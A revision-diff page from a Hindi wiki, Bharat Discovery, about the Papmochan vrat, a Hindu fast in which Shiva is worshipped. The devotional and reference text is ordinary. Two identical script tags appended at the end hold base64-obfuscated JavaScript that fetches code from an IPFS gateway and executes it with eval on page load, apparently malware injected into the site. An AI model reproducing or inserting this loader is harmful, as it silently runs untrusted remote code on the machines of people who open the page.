Difference between revisions of "पापमोचन व्रत"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "==टीका टिप्पणी और संदर्भ==" to "{{संदर्भ ग्रंथ}} ==टीका टिप्पणी और संदर्भ==")
 
Line 1: Line 1:
 
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।
 
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।
*जो व्यक्ति 12 दिनों तक बिना खाये बिल्व वृक्ष के नीचे रहता है, वह भ्रूण हत्या के पाप से मुक्त हो जाता है.
+
*जो व्यक्ति 12 दिनों तक बिना खाये [[बिल्व वृक्ष]] के नीचे रहता है, वह भ्रूण हत्या के पाप से मुक्त हो जाता है.
 
*इस व्रत में भगवान [[शिव]]की पूजा की जाती है।<ref>हेमाद्रि (व्रतखण्ड 2, 396, सौरपुराण से उद्धरण)।</ref>
 
*इस व्रत में भगवान [[शिव]]की पूजा की जाती है।<ref>हेमाद्रि (व्रतखण्ड 2, 396, सौरपुराण से उद्धरण)।</ref>
  
{{संदर्भ ग्रंथ}}
+
 
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>

Latest revision as of 12:27, 2 June 2013

  • bharat mean dharmik vratoan ka sarvavyapi prachar raha hai. yah hindoo dharm granthoan mean ullikhit hindoo dharm ka ek vrat sanskar hai.
  • jo vyakti 12 dinoan tak bina khaye bilv vriksh ke niche rahata hai, vah bhroon hatya ke pap se mukt ho jata hai.
  • is vrat mean bhagavan shivki pooja ki jati hai.[1]


tika tippani aur sandarbh

  1. hemadri (vratakhand 2, 396, saurapuran se uddharan).

any sanbandhit liank

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>